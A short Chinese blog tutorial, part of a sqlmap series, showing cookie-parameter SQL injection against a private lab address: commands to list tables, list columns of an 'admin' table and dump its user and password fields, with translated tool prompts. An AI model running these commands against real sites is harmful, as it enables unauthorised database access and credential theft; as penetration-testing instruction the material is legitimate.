sqlmap之(五)----Cookie注入实战

(1) cookie注入,猜解表

 

 

[html] view plain copy
 
  1. sqlmap.py -u "http://192.168.87.129/shownews.asp" --cookie "id=27" --table --level 2  

 

 


do you want to URL encode cookie values (implementation specific)? [Y/n]

你想要对URL值进行URL编码(具体实现)吗?   输入"Y"

 

 

Cookie parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

cookie参数“id”是脆弱的。你想继续测试其他(如果有的话)吗?  输入"Y"

 

 

do you want to use common table existence check? [Y/n/q]

你是否要使用存在的公共表去检查? [Y/n/q]  输入"Y" 并输入线程数。

 

 

等待一下就出结果了。

 

 

(2) 猜解字段,(通过1的表猜解字段,假如表为admin)

 

 

[html] view plain copy
 
  1. sqlmap.py -u "http://192.168.87.129/shownews.asp" --cookie "id=27" --columns -T admin --level 2  

 

 

 

(3) 猜解内容

 

 

[html] view plain copy
 
  1. sqlmap.py -u "http://192.168.87.129/shownews.asp" --cookie "id=27" --dump -T admin -C "user,password" --level 2  


 

 

猜出的内容为

 

 
 
posted @ 2017-06-15 11:09  寂地沉  阅读(594)  评论(0编辑  收藏  举报